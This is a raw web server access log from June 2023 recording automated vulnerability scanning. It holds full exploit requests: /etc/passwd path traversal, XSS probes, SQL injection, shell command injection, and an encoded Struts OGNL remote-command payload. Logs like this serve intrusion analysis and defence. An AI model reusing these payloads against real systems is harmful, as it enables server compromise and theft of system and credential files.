90.151.171.108 - - [17/Jun/2023:14:04:30 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:14:04:35 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:14:04:35 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:14:04:35 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:14:04:35 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:14:04:51 +0530] "GET /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:14:04:52 +0530] "GET /admin/ HTTP/1.1" 404 1006
41.186.73.134 - - [17/Jun/2023:14:07:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:08:23 +0530] "GET /index.php?controller=../../../../../../../../../../../../../etc/passwd%00&option=com_dioneformwizard HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:08:23 +0530] "GET /index.php?controller=../../../../../../../../../../../../../etc/passwd%00&option=com_dioneformwizard HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:14:08:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:11:33 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:14:11:33 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:14:11:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:14:13:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
65.78.116.50 - - [17/Jun/2023:14:13:22 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:14:16:06 +0530] "GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:14:16:06 +0530] "GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:14:16:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:16:27 +0530] "GET /.svn/wc.db HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:14:16:29 +0530] "GET /wc.db HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:14:16:29 +0530] "GET /.svn/wc.db HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:14:16:31 +0530] "GET /wc.db HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:14:16:51 +0530] "GET /plugins/servlet/Wallboard/?cyclePeriod=alert(document.domain)&dashboardId=10000&dashboardId=10000 HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:14:16:52 +0530] "GET /plugins/servlet/Wallboard/?cyclePeriod=alert(document.domain)&dashboardId=10000&dashboardId=10000 HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:14:17:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:18:14 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:14:18:15 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:14:19:49 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:19:50 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:19:51 +0530] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:14:19:52 +0530] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:14:20:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:14:21:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:21:45 +0530] "POST /templates/default/html/windows/right.php HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:14:21:45 +0530] "POST /templates/default/html/windows/right.php HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:14:22:45 +0530] "GET /jsapi_ticket.json HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:14:22:46 +0530] "GET /jsapi_ticket.json HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:14:24:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:24:42 +0530] "GET /picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmNvb2tpZSk7Ly8=&urls HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:14:24:42 +0530] "GET /picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmNvb2tpZSk7Ly8=&urls HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:14:24:51 +0530] "GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1" 404 1176
107.189.31.184 - - [17/Jun/2023:14:24:53 +0530] "GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1" 404 1176
41.186.73.134 - - [17/Jun/2023:14:25:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:25:54 +0530] "GET /%0d%0aSet-Cookie:crlfinjection=1; HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:14:25:54 +0530] "GET /%0d%0aSet-Cookie:crlfinjection=1; HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:14:26:18 +0530] "GET /dashboardUser HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:14:26:18 +0530] "GET /dashboardUser HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:14:28:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:29:25 +0530] "GET /login?redirect=%2F HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:14:29:25 +0530] "GET /login?redirect=%2F HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:14:29:33 +0530] "GET /kfm/index.php/%27%3Cscript%3Ealert%28document.domain%29;%3C/script%3E HTTP/1.1" 404 1132
107.189.31.184 - - [17/Jun/2023:14:29:33 +0530] "GET /kfm/index.php/%27%3Cscript%3Ealert%28document.domain%29;%3C/script%3E HTTP/1.1" 404 1132
41.186.73.134 - - [17/Jun/2023:14:29:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:32:33 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:14:32:34 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:14:32:36 +0530] "GET /ui/clusters/kafka-ui/brokers HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:14:32:37 +0530] "GET /ui/clusters/kafka-ui/brokers HTTP/1.1" 404 1050
41.186.73.134 - - [17/Jun/2023:14:33:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:33:56 +0530] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:14:33:58 +0530] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 1028
194.165.16.37 - - [17/Jun/2023:14:34:08 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:14:34:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:14:36:48 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:14:36:48 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:14:36:49 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:14:36:49 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:14:36:53 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [17/Jun/2023:14:36:53 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:14:36:53 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:14:36:53 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:14:37:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:14:38:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:38:37 +0530] "GET /.%00./.%00./etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:14:38:38 +0530] "GET /.%00./.%00./etc/passwd HTTP/1.1" 400 -
168.70.64.245 - - [17/Jun/2023:14:39:10 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:14:39:26 +0530] "GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1096
107.189.31.184 - - [17/Jun/2023:14:39:26 +0530] "GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1096
107.189.31.184 - - [17/Jun/2023:14:40:08 +0530] "GET /cgi-bin/cgibox?.cab HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:14:40:09 +0530] "GET /cgi-bin/cgibox?.cab HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:14:40:10 +0530] "GET /cgi-bin/cgibox?/nobody HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:14:40:11 +0530] "GET /cgi-bin/cgibox?/nobody HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:14:41:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:14:42:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:44:36 +0530] "GET /login?login=lutron&password=lutron HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:14:44:36 +0530] "GET /login?login=lutron&password=lutron HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:14:44:46 +0530] "GET /log/ HTTP/1.1" 404 1002
107.189.31.184 - - [17/Jun/2023:14:44:46 +0530] "GET /log/ HTTP/1.1" 404 1002
41.186.73.134 - - [17/Jun/2023:14:46:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:14:47:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:47:42 +0530] "POST /index/login.cgi HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:14:47:43 +0530] "POST /index/login.cgi HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:14:47:52 +0530] "POST /homeaction.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:14:47:54 +0530] "POST /homeaction.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:14:48:17 +0530] "GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:48:18 +0530] "GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:48:57 +0530] "GET /?piereg_logout_url=true&redirect_to=https://interact.sh HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:14:48:57 +0530] "GET /?piereg_logout_url=true&redirect_to=https://interact.sh HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:14:50:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:50:42 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:50:42 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:51:22 +0530] "GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:14:51:22 +0530] "GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:14:51:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:52:02 +0530] "t3 12.2.1 " 400 -
107.189.31.184 - - [17/Jun/2023:14:52:02 +0530] "t3 12.2.1 " 400 -
107.189.31.184 - - [17/Jun/2023:14:53:17 +0530] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:14:53:17 +0530] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:14:54:47 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:14:54:47 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:14:54:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:54:55 +0530] "GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1" 404 1166
107.189.31.184 - - [17/Jun/2023:14:54:55 +0530] "GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1" 404 1166
107.189.31.184 - - [17/Jun/2023:14:55:18 +0530] "GET /s/2RHotvh6dwhc7RaOmf1ADlCxbww/_/;/WEB-INF/web.xml HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:14:55:19 +0530] "GET /s/2RHotvh6dwhc7RaOmf1ADlCxbww/_/;/WEB-INF/web.xml HTTP/1.1" 404 1092
198.235.24.193 - - [17/Jun/2023:14:55:23 +0530] "GET / HTTP/1.0" 200 11230
41.186.73.134 - - [17/Jun/2023:14:55:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:57:33 +0530] "POST /api/user/login HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:14:57:34 +0530] "POST /api/user/login HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:14:59:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
209.141.41.129 - - [17/Jun/2023:14:59:43 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:14:59:59 +0530] "GET /?lang=../../thinkphp/base HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:15:00:00 +0530] "GET /?lang=../../thinkphp/base HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:15:00:01 +0530] "GET /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:15:00:02 +0530] "GET /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:15:00:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:03:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:04:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:04:30 +0530] "GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:04:31 +0530] "GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:05:14 +0530] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:05:16 +0530] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:15:07:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:08:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:08:37 +0530] "GET /../conf/config.properties HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:08:38 +0530] "GET /../conf/config.properties HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:10:56 +0530] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&name=2RHotqNzuGt4i5OtBi7wiJCiyY7.php:aaa&target=l1_Lw HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:15:10:57 +0530] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&name=2RHotqNzuGt4i5OtBi7wiJCiyY7.php:aaa&target=l1_Lw HTTP/1.1" 404 1062
193.35.18.51 - - [17/Jun/2023:15:11:35 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:15:11:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:12:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:13:40 +0530] "GET /api/get-organizations?field=updatexml(1,version(),1)&p=123&pageSize=123&sortField&sortOrder&value=cfx HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:15:13:42 +0530] "GET /api/get-organizations?field=updatexml(1,version(),1)&p=123&pageSize=123&sortField&sortOrder&value=cfx HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:15:13:56 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:13:58 +0530] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:13:58 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:14:00 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:14:00 +0530] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:14:03 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:15:59 +0530] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:15:16:00 +0530] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:15:16:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:15:16:28 +0530] "CONNECT api.ipify.org:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:15:16:28 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:15:16:28 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:15:16:28 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:15:16:33 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:15:16:33 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:15:16:33 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:15:16:33 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:15:16:39 +0530] "GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:16:39 +0530] "GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:15:17:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:18:02 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:04 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:05 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:07 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:08 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:10 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:11 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:14 +0530] "GET /hoteldruid/visualizza_tabelle.php?anno=2019&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&cerca_id_passati=1&id_sessione&num_cambia_pren=1&subtotale_selezionate=1&tipo_tabella=prenotazioni HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:15:18:14 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:15:18:14 +0530] "GET /hoteldruid/visualizza_tabelle.php?anno=2019&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&cerca_id_passati=1&id_sessione&num_cambia_pren=1&subtotale_selezionate=1&tipo_tabella=prenotazioni HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:15:18:32 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:15:18:33 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:15:19:04 +0530] "GET /telescope/requests HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:15:19:05 +0530] "GET /telescope/requests HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:15:19:42 +0530] "GET /install/app.php HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:15:19:43 +0530] "GET /install/app.php HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:15:19:59 +0530] "GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:15:20:01 +0530] "GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:15:20:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:21:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:21:54 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:15:22:00 +0530] "-" 400 -
45.128.232.141 - - [17/Jun/2023:15:22:10 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:15:23:47 +0530] "GET /client/index.html HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:15:23:48 +0530] "GET /client/index.html HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:15:24:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:25:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:26:32 +0530] "GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:15:26:32 +0530] "GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:15:26:49 +0530] "GET /home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:15:26:50 +0530] "GET /home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:15:28:41 +0530] "POST /cu.html HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:15:28:41 +0530] "POST /cu.html HTTP/1.1" 404 1008
41.186.73.134 - - [17/Jun/2023:15:29:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:30:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:15:33:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:33:48 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:15:33:49 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:15:34:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:15:35:46 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:35:46 +0530] "GET null null" 400 -
198.235.24.165 - - [17/Jun/2023:15:36:13 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:17 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:15:36:19 +0530] "GET null null" 400 -
